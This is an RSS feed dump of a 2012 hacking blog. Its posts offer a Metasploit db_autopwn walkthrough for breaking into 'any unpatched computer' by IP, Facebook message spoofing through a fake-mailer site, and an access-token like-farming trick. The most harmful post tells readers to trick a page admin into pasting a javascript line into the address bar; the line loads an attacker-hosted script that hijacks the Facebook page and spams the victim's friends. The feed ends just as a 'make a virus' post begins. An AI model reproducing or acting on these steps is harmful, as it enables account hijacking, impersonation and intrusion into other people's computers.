<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-615852925198318135</atom:id><lastBuildDate>Mon, 25 Aug 2025 16:55:32 +0000</lastBuildDate><category>Softwares</category><category>tricksntips</category><category>Others</category><category>facebook</category><category>Web Hacking</category><category>Gmail Hacking</category><category>Rats</category><category>Yahoo Hacking</category><category>Wireless Hacks</category><category>virus protection</category><category>Msn Hacaking</category><category>Phising Tools</category><category>Proxy</category><category>Virus Creator</category><category>Cracking</category><category>Sniffers</category><category>Vpn</category><category>Pc Hack</category><category>keyloggers</category><category>stealers</category><title>Hacking and Cracking Softwares</title><description>Learn Ethical Hacking,Get All Hacking Softwares And Stuff For Free And Know About All Types Of Malwares And Spywares.</description><link>http://hackingcrackingsoftwares.blogspot.com/</link><managingEditor>noreply@blogger.com (Anonymous)</managingEditor><generator>Blogger</generator><openSearch:totalResults>59</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-696877402572627944</guid><pubDate>Tue, 04 Dec 2012 17:37:00 +0000</pubDate><atom:updated>2012-12-04T09:37:44.896-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">facebook</category><category domain="http://www.blogger.com/atom/ns#">Others</category><category domain="http://www.blogger.com/atom/ns#">Pc Hack</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><title>Hack Any Computer With An IP :PC HACK</title><description>&lt;u&gt;&lt;em&gt;&lt;strong&gt;Hack Any Computer With An IP&lt;/strong&gt;&lt;/em&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP-FyeynpUSZUaiZF0_8Uuoj72dSNaxNvah6QFm35GyhAW64cGBSZBc2HKIGA_lhmMUNEcWh47OXqm3iWJdMaylr0OvLRqjFo0D5UIw9747ozuLRbYxDabSho2kgelyhWeYURgyXUA6a4/s1600/Pc-hack.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP-FyeynpUSZUaiZF0_8Uuoj72dSNaxNvah6QFm35GyhAW64cGBSZBc2HKIGA_lhmMUNEcWh47OXqm3iWJdMaylr0OvLRqjFo0D5UIw9747ozuLRbYxDabSho2kgelyhWeYURgyXUA6a4/s1600/Pc-hack.jpg&quot; height=&quot;320&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;I am here to show you this magical tool called Metasploit that allows you to hack ANYunpatched computer with only it’s IP. Lets begin…&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&amp;nbsp;(1) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.&lt;br /&gt;&amp;nbsp;(2) You need PostgrSQL for your database. Download here:&lt;br /&gt;&lt;br /&gt;
&amp;nbsp;&lt;a href=&quot;http://adf.ly/2542194/http://www.postgresql.org&quot; target=&quot;_blank&quot;&gt;Download Here&lt;/a&gt;
&lt;br /&gt; Make sure you use all the defaults or Metasploit woun’t work!&lt;br /&gt;&amp;nbsp;(3) Now lets get down to buisness… After installing both tools, open up the PostgrSQL admin gui (start -&amp;gt; all programs -&amp;gt; PostgreSQL 9.0 -&amp;gt; pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5…&lt;br /&gt;&lt;br /&gt;&amp;nbsp;(4) Time for some hacking! Go to start -&amp;gt; all programs -&amp;gt; Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:&lt;br /&gt;&lt;br /&gt;&amp;nbsp;(5)Now, in the window type:&lt;br /&gt; db_connect postgres:ThePassYouChose@localhost:5432&lt;br /&gt; The first time you do this you will see lots of text flash buy. Don’t wory, this is normal.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Type db_host to make sure you are connected correctally.&lt;br /&gt;&amp;nbsp;(6)Now type this:&lt;br /&gt; db_nmap 000.000.000.000&lt;br /&gt; Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000…&lt;br /&gt;&amp;nbsp;(7) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back…&lt;br /&gt;&amp;nbsp;(8) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.&lt;br /&gt;&amp;nbsp;(9) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:&lt;br /&gt; sessions -i ExploitNumber&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;color: #660000;&quot;&gt;ENJOY!&lt;/span&gt;</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/12/hack-any-computer-with-ip-pc-hack.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP-FyeynpUSZUaiZF0_8Uuoj72dSNaxNvah6QFm35GyhAW64cGBSZBc2HKIGA_lhmMUNEcWh47OXqm3iWJdMaylr0OvLRqjFo0D5UIw9747ozuLRbYxDabSho2kgelyhWeYURgyXUA6a4/s72-c/Pc-hack.jpg" height="72" width="72"/><thr:total>107</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-5731416076524485589</guid><pubDate>Fri, 16 Nov 2012 09:17:00 +0000</pubDate><atom:updated>2012-11-16T01:17:44.100-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">facebook</category><category domain="http://www.blogger.com/atom/ns#">Gmail Hacking</category><category domain="http://www.blogger.com/atom/ns#">Others</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><category domain="http://www.blogger.com/atom/ns#">Yahoo Hacking</category><title>Facebook Message Spoofing : Facebook</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTd4-h2FDDpBH9U-9mcG0DlFEUXLvOfeIHjye8oYMS-kEA3fe987YgfsaH-G83wu4P_w-rk-CSLolz3AjbkmHWjrg9EOQ_GU8rNIpNgjZMLP0ctzmTu2rFmRX0l2fij01TOe4KrbUhkeQ/s1600/facebook+spoofing+fake+mail.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;80&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTd4-h2FDDpBH9U-9mcG0DlFEUXLvOfeIHjye8oYMS-kEA3fe987YgfsaH-G83wu4P_w-rk-CSLolz3AjbkmHWjrg9EOQ_GU8rNIpNgjZMLP0ctzmTu2rFmRX0l2fij01TOe4KrbUhkeQ/s320/facebook+spoofing+fake+mail.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;Facebook Message Spoofing &lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
1: Sender Email id which is on his/her Facebook account(example@gmail.com)&lt;br /&gt;&lt;br /&gt;&amp;nbsp;2: Recivers Facebook Email id (username@facebook.com).&lt;br /&gt;&lt;br /&gt;Lets Start :&lt;br /&gt;&lt;br /&gt;&amp;nbsp;STEP 1:&lt;br /&gt;
&amp;nbsp;First Go to this Fake mailer site &lt;a href=&quot;http://adf.ly/2542194/http://emkei.cz/&quot; target=&quot;_blank&quot;&gt;Click here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;STEP2:&lt;br /&gt;
&amp;nbsp;Then in FROM NAME and FROM E-MAIL type the Sender Email id (example@gmail.com).&lt;br /&gt;&lt;br /&gt;&amp;nbsp;STEP3:&lt;br /&gt;
Now in TO Write Recivers Facebook Email id (username@facebook.com)&lt;br /&gt;&lt;br /&gt;&amp;nbsp;STEP 4:&lt;br /&gt;
Now leave all options And come to TEXT write your message&lt;br /&gt;&lt;br /&gt;&amp;nbsp;STEP 5:&lt;br /&gt;
Enter Captcha and click on send.&lt;br /&gt;&lt;br /&gt;Here is a Video Tutorial for This &lt;span style=&quot;color: #660000;&quot;&gt;ENJOY!&lt;/span&gt;&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/11/facebook-message-spoofing-facebook.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTd4-h2FDDpBH9U-9mcG0DlFEUXLvOfeIHjye8oYMS-kEA3fe987YgfsaH-G83wu4P_w-rk-CSLolz3AjbkmHWjrg9EOQ_GU8rNIpNgjZMLP0ctzmTu2rFmRX0l2fij01TOe4KrbUhkeQ/s72-c/facebook+spoofing+fake+mail.PNG" height="72" width="72"/><thr:total>27</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-4231168100568717184</guid><pubDate>Fri, 16 Nov 2012 09:06:00 +0000</pubDate><atom:updated>2012-11-16T01:06:58.547-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">facebook</category><category domain="http://www.blogger.com/atom/ns#">Others</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><title>Facebook 200-1000 likes in 60 seconds : Facebook</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt6PmQD7X1RxasEEM2s47T7Se-gBbBhrAKQr00M1mS16yHt5aMjqDFDpmgHp36wAXgZfovGDGEoUqDFLp8lRC2tbGZ4FjLOdefGwhiLKOwXg4CDBe7kd7bmaUXukppC5-HKC5RCTD1Ocg/s1600/facebook.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt6PmQD7X1RxasEEM2s47T7Se-gBbBhrAKQr00M1mS16yHt5aMjqDFDpmgHp36wAXgZfovGDGEoUqDFLp8lRC2tbGZ4FjLOdefGwhiLKOwXg4CDBe7kd7bmaUXukppC5-HKC5RCTD1Ocg/s320/facebook.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&lt;u&gt;&lt;i&gt;&lt;b&gt;Facebook 200-1000 likes in 60 seconds&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Hello! as the title says how to get free facebook likes on your pictures /status! no download!&lt;br /&gt;&lt;br /&gt;1) So the first thing you need to do before starting is to enable subscribers on your facebook you can do that here: www.facebook.com/about/subscribe&lt;br /&gt;&lt;br /&gt;2) Head over to &lt;a href=&quot;http://adf.ly/2542194/http://likelo.com/&quot; target=&quot;_blank&quot;&gt;click here&lt;/a&gt; then click where it says :Click here&amp;nbsp; And Allow Permission To xPeria To Get Access Token&lt;br /&gt;&lt;br /&gt;3) allow the xperia applicaton then copy the text in your webbrowser search bar. And paste it in the search box at Likelo.com&lt;br /&gt;&lt;br /&gt;&amp;nbsp;4)choose the photo or status to being liked! Then PANG you got between 100-300 likes!&lt;br /&gt;&lt;br /&gt;&amp;nbsp;5) go to accountsettings on facebook&amp;gt;Applications&amp;gt;DELETE the xperia application you allowed in step 3 otherwhise you will also start liking others pics/status.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Done!&lt;br /&gt;&lt;br /&gt;Similar site you can use after to get around 100 extra likes: &lt;a href=&quot;http://adf.ly/2542194/http://powerlike.org/&quot; target=&quot;_blank&quot;&gt;Click here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Thanks so much for me hope you liked it&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/11/facebook-200-1000-likes-in-60-seconds.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt6PmQD7X1RxasEEM2s47T7Se-gBbBhrAKQr00M1mS16yHt5aMjqDFDpmgHp36wAXgZfovGDGEoUqDFLp8lRC2tbGZ4FjLOdefGwhiLKOwXg4CDBe7kd7bmaUXukppC5-HKC5RCTD1Ocg/s72-c/facebook.png" height="72" width="72"/><thr:total>36</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-7375167945021049938</guid><pubDate>Tue, 06 Nov 2012 03:10:00 +0000</pubDate><atom:updated>2012-11-05T19:10:21.336-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">facebook</category><category domain="http://www.blogger.com/atom/ns#">Gmail Hacking</category><category domain="http://www.blogger.com/atom/ns#">Msn Hacaking</category><category domain="http://www.blogger.com/atom/ns#">Others</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><category domain="http://www.blogger.com/atom/ns#">Yahoo Hacking</category><title>Where to Start with hacking</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;u&gt;Where to start with hacking? &lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq2XgVU8p90-i7dm7wT87KXhom-im4hNrw6eStbKz2X54axO5xQiefv_YYayCwYp5-ZPlxdDxZJiyHcXyfu22fu2Pg-tgNE8k5Hfi9eAvTgT30VFQvjZdLBmRxFOK4Fx0CTvKOYx3uHW8/s1600/hacking.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;209&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq2XgVU8p90-i7dm7wT87KXhom-im4hNrw6eStbKz2X54axO5xQiefv_YYayCwYp5-ZPlxdDxZJiyHcXyfu22fu2Pg-tgNE8k5Hfi9eAvTgT30VFQvjZdLBmRxFOK4Fx0CTvKOYx3uHW8/s320/hacking.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I have seen this question so many times, “Where to start with hacking?” Now I am going to give you my opinion on where to begin. There is just one thing you should remember, “Hacking is a lifestyle”.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;There are three types of hackers:&lt;br /&gt;&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
White Hats:&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&amp;nbsp;The White Hat hacker has dedicated himself to fight malware and help others with their computer problems. He is a person you can trust, and he will most likely end up in a good paying job as a computer programmer or a security consultant. He will most certainly not end up in jail.&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Grey Hats:&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&amp;nbsp;The Grey Hat hacker are in between white Hats and Black Hats. He will most likely commit pranks at people that he thinks is harmless, but it can also be illegal. He can at one time be helpful and help you with a computer problem, but at the same time infect you with his own virus. There is a chance that the grey hat will end up in prison.&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
&amp;nbsp;Black Hats:&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&amp;nbsp;The Black hat hacker also known as a cracker is the one who deface websites, steal private information and such illegal activity. It is very time consuming to become a black hat. It can be very hard for them to get a job because of the illegal activity. If law enforcements gets you, you can expect jail time. &lt;br /&gt;&lt;/div&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
So where to start?&lt;/h4&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&amp;nbsp;You should know the answer to these questions before you start your hacking career.&lt;br /&gt;&lt;/div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Which type of hacker do you want to be (white hat, grey hat or black hat)?&lt;/li&gt;
&lt;li&gt;Which type of hacking do you want to work with (website hacking, system exploits, pentesting etc.)?&lt;/li&gt;
&lt;li&gt;What is your end-goal?&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;br /&gt;&amp;nbsp;You should meet these requirements to become a successful hacker.&lt;br /&gt;&lt;/div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;You shall be patient.&lt;/li&gt;
&lt;li&gt;You shall dedicate a lot of time to hacking. You will never stop learning, since hacking is a lifestyle.&lt;/li&gt;
&lt;li&gt;You should have a computer (I expect you to have one since you are reading this).&lt;/li&gt;
&lt;li&gt;You shall be interested in how the different computer systems works, and how to control them.&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Now that you have an idea of what kind of hacker, you want to be we will look closer into the different topics you can work with as a hacker.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
&amp;nbsp;Website Hacking:&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&amp;nbsp;You properly already guessed it, but website hacking is about hacking websites. You use your skills to find exploits and vulnerabilities in websites and web applications. Almost all major hacking stories in the news are about websites and databases that have been hacked. Once you have enough experience in website security you will be amazed about how easy it is to find vulnerabilities in websites. However, it will take a lot of effort and time to reach that level of skills. You will need to know a large amount of server-side languages and website construction languages like PHP, HTML, JavaScript, SQL, ASP, ASP.NET and Perl. This was just some of the languages you should know about. I will recommend you to take JavaScript, SQL and PHP very serious since it is in those languages you will find the most vulnerabilities. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Pentesting and Forensics:&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&amp;nbsp;Pentesting and forensics can earn you big money. It is these guys the company’s call when they have been hacked. They are exerts in operating systems, wireless connections and exploiting computers. This way will take A LOT of time and effort since there is so much you should know about. You shall know about how the different operating systems works, which exploit there is to them, how to exploit them, routers, encryption, malware etc. the list is almost endless. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Code exploiting:&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&amp;nbsp;Not many people know about this. This will require you to be a complete expert at programming. You shall be at least as good at these programming languages as your main language like English. This kind of hacking is taking a lot of time, and will require you to be patient. Do not get me wrong, every company that releases software like Symantec, Google, Microsoft, Adobe, and Oracle have hackers with these skills employed to check their software for vulnerabilities. Sadly, they cannot find every security hole and therefore some very smart black hat hackers are able to find them, and exploit them before the companies get the vulnerability patched. You should know the most popular languages like C++, Java and C etc.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Computer security:&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&amp;nbsp;The work these people do looks a lot like the pentesters. These people is able to detect and analyze new viruses and malware. They are working for companies like Symantec, KasperSky and Avira etc. Some of them are also working on labs that tests AV’s and new viruses. They are experts in how viruses works and how they infect systems. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;You should now have an idea on where to start and in which direction you want to go. If you found any errors or typos feel free to contact me, and I will look into it. I will be updating this thread recently and add more details. I will soon add a dictionary, which explains the most basic hacking terms. I have putted a lot of effort in this tutorial and my goal with this tutorial is to give computer-interested people an idea of where they should start. &lt;br /&gt;&lt;br /&gt;&amp;nbsp;To the so-called “noobs”, (though I am not a fan of that expression) who reads this:&lt;br /&gt;&lt;br /&gt;I hope I have inspired you to begin at hacking. I hope that I have cleared things up a little bit, so it does not seem so messy anymore. If you have any questions or something you did not understand, I would gladly explain it to you again. As one last thing, I would HIGHLY recommend you to become a white hat hacker. Welcome to the hacker’s world, a new world will open up for you and you will never regret that you chose to become a hacker.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;(08-26-2012 07:02 PM)&lt;br /&gt;mrLyosha Wrote:&amp;nbsp; &lt;br /&gt;I&#39;m glad that you found my post informative and useful.And after some time I remembered one more kind of hackers closely connected to Black Hat Hacking it&#39;s a Script Kidding. Some authors put it in different kind, but to be absolutely true Script Kiddies are Black Hats but without good knowledge of hacking, using only automated tools and attacking bad protected targets.&lt;br /&gt;&amp;nbsp;p.s. I&#39;m just begging learning now basics, so sorry if I&#39;m mistaken, and sorry for possible grammar mistakes in my posts)&lt;br /&gt;&amp;nbsp;p.s.s Just saw that I have rank: Script kiddie)&lt;br /&gt;&lt;br /&gt;&amp;nbsp;mrLyosha asked for this, and just for any case that anybody is interested in this?&lt;br /&gt;&lt;br /&gt;&amp;nbsp;I have just wrote this down, and i think it will explain your different hacker &quot;ranks&quot;.&lt;br /&gt;&lt;br /&gt;The Elite Hacker: They know what they are talking about. they are expert in their fields, and they are the top of the food chain. They are writing the programs the Script Kiddies use, and they gain much respect as they know their shit.&lt;br /&gt;&lt;br /&gt;The Middle Class Hacker: They know a lot about hacking, and are about to step up to The Elite Hacker. But they do still have a lot to learn. They have a lot of skills, and most or some of them will be able to write their own programs or find the vulnerabilities by themselves.&lt;br /&gt;&lt;br /&gt;The Script Kiddie: They are beginners or complete morons. They usually find a SQL injectable site and thinks they the most l33t H4x0r in the world. They use the tools written by The Elite Hacker and have absolutely no idea what they are doing.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;But some Script Kiddies are just learning and are not bragging about how they found a SQL injectable site. They study others work and learn about how they did it. These guys will definitly be better hackers and will gain respect as they are just trying to learn, not to prove that they can find a SQL injectable site.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;color: #660000;&quot;&gt;ENJOY!&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/11/where-to-start-with-hacking.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq2XgVU8p90-i7dm7wT87KXhom-im4hNrw6eStbKz2X54axO5xQiefv_YYayCwYp5-ZPlxdDxZJiyHcXyfu22fu2Pg-tgNE8k5Hfi9eAvTgT30VFQvjZdLBmRxFOK4Fx0CTvKOYx3uHW8/s72-c/hacking.jpg" height="72" width="72"/><thr:total>22</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-5446857815195599439</guid><pubDate>Tue, 06 Nov 2012 03:02:00 +0000</pubDate><atom:updated>2012-11-05T19:02:19.831-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">facebook</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><title>Facebook Password Hacking : Steps To Hack Admin Facebook Fan Page</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;Facebook Password Hacking : Steps To Hack Admin Facebook Fan Page&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzySYVOWb-4ObmmH1s1jjqCg55odSkNXPcMSK5pZzvu8ImIyblE1H5EWjYC8Ob9FeWIchczVHIUAiVsHydEB67K7DLWTgdVSxQrfOPOuKAuH5bcWojK_jjNFD5FKq8fhuLajojQQaMY_8/s1600/facebook1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzySYVOWb-4ObmmH1s1jjqCg55odSkNXPcMSK5pZzvu8ImIyblE1H5EWjYC8Ob9FeWIchczVHIUAiVsHydEB67K7DLWTgdVSxQrfOPOuKAuH5bcWojK_jjNFD5FKq8fhuLajojQQaMY_8/s1600/facebook1.jpg&quot; /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
Step 1: First download Facebook page hacking exploit...&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/2542194/http://www.mediafire.com/?2y27faa37xkf1sp&quot; target=&quot;_blank&quot;&gt;Click here to download &lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Step 2: Now open the pagehack.js with notepad and search 4 nk@wildhacker.com and change nk@wildhacker.com with your facebook email.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Step 3: Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js) and then save it.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Step 4: Now create a account on free hosting like 0fess.net or 000webhost.com ( 110mb won t help this time)and upload facebook page hacking exploit on your free hosting website. you will get url address something like this,&lt;br /&gt;&lt;br /&gt;www.yoursite.com/pagehack.js &lt;br /&gt;
Step 5: Now ask victim to paste this in browser address bar, He must be admin of page, which you wants to hack: &lt;br /&gt;&lt;br /&gt;j(a = (b = document).createElement(&quot;script&quot;)).src = &quot;http://www.yourwbesite.com/pagehack.js&quot;, b.body.appendChild(a); void(0)&lt;br /&gt;&lt;br /&gt;Note : Change scr = http://www.yourwbesite.com/pagehack.js in javascript with your own address. &lt;br /&gt;&lt;br /&gt;Tip: Tell him that it will make your page safe, or something else like attracting. &lt;br /&gt;&lt;br /&gt;&amp;nbsp;When he will put this key in address bar and that&#39;s it you will get a notification that you are admin of his page now. &lt;br /&gt;&lt;br /&gt;&amp;nbsp;Enjoy, But don&#39;t hack for bad cause, I will not be responsible for any consequences made by you. &lt;br /&gt;&lt;br /&gt;&amp;nbsp;Thats it.. &lt;span style=&quot;color: #660000;&quot;&gt;ENJOY!&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/11/Hack-Admin-Facebook-Fan-Page.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzySYVOWb-4ObmmH1s1jjqCg55odSkNXPcMSK5pZzvu8ImIyblE1H5EWjYC8Ob9FeWIchczVHIUAiVsHydEB67K7DLWTgdVSxQrfOPOuKAuH5bcWojK_jjNFD5FKq8fhuLajojQQaMY_8/s72-c/facebook1.jpg" height="72" width="72"/><thr:total>26</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-9072031125267753394</guid><pubDate>Mon, 29 Oct 2012 22:04:00 +0000</pubDate><atom:updated>2012-10-29T15:04:55.930-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><category domain="http://www.blogger.com/atom/ns#">Virus Creator</category><title>Make a virus to disable mouse </title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
